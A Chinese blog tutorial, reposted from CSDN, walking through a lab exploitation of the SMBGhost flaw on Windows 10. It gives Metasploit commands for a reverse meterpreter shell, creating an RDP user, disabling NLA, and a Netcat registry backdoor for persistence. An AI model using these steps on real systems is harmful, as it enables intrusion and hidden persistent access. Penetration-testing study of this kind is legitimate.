0


掌握安全渗透测试:利用永恒之黑漏洞获取Windows 10系统访问权限

以下是利用永恒之黑漏洞对Windows 10进行渗透测试的步骤:

环境介绍

  • 靶机:IP地址为192.168.1.60,运行Windows 10 1903版本。
  • 攻击机:IP地址为192.168.1.53

靶机准备

  1. 检查Windows 10版本号:确保靶机运行的Windows 10版本受到永恒之黑漏洞(CVE-2020-0796 SMBGhost)的影响。
  2. 检查系统补丁:确认靶机未安装补丁KB4551762,该补丁修复了永恒之黑漏洞。
  3. 开启445端口:确保靶机的445端口(SMB协议)是开放的。

获取Shell

  1. 使用Metasploit框架:- 启动Metasploit:msfconsole。- 使用永恒之黑漏洞模块:use exploit/windows/smb/cve_2020_0796_smbghost
  2. 设置选项:- 显示模块选项:show options。- 设置目标主机IP:set RHOSTS 192.168.1.60。- 设置payload:set payload windows/x64/meterpreter/reverse_tcp。- 设置攻击机监听IP:set LHOST 192.168.1.53。- 禁用模拟模式:set DefangedMode false
  3. 执行exploit:- 运行exploit:exploit

创建新用户并开启远程桌面

  1. 开启RDP远程桌面:- 使用Metasploit的post/windows/manage/enable_rdp模块开启RDP服务,并创建新用户。
  2. 创建RDP用户:- 设置用户名和密码:set username xuegodset password 123456。- 指定会话ID:set session 1。- 运行模块:run
  3. 检查NLA设置:- 查询注册表以确定是否开启网络级身份验证(NLA)。
  4. 关闭NLA(如果开启):- 修改注册表值SecurityLayerUserAuthentication为0,以允许非NLA的RDP连接。
  5. 连接远程桌面:- 在Kali上使用rdesktop命令连接到靶机的远程桌面:rdesktop 192.168.1.60

开启后门维持权限访问

  1. 配置后门程序:- 上传nc(Netcat)到Windows 10系统。- 修改注册表添加启动项,以便在系统启动时执行nc反弹shell命令。
  2. 设置防火墙规则:- 允许443端口的网络访问,以使后门有效。
  3. 重启Windows 10:- 重启靶机以应用更改,并等待后门程序运行。
  4. 连接后门:- 在Kali上使用nc命令连接后门:nc -v 192.168.1.60 443
  5. MSF控制台连接(可选):- 在Metasploit框架中使用connect命令连接到后门:connect 192.168.1.60 443

总结

  • 文档提供了利用永恒之黑漏洞对Windows 10进行渗透的详细步骤,包括获取初始访问、创建远程桌面用户、开启后门以及维持权限访问。

请注意,这些步骤仅供教育目的,实际操作应在授权的渗透测试和安全研究环境中进行。未经授权的渗透测试可能违反法律。


本文转载自: https://blog.csdn.net/weixin_43822401/article/details/139079939
版权归原作者 小宇python 所有, 如有侵权,请联系我们删除。

“掌握安全渗透测试:利用永恒之黑漏洞获取Windows 10系统访问权限”的评论:

还没有评论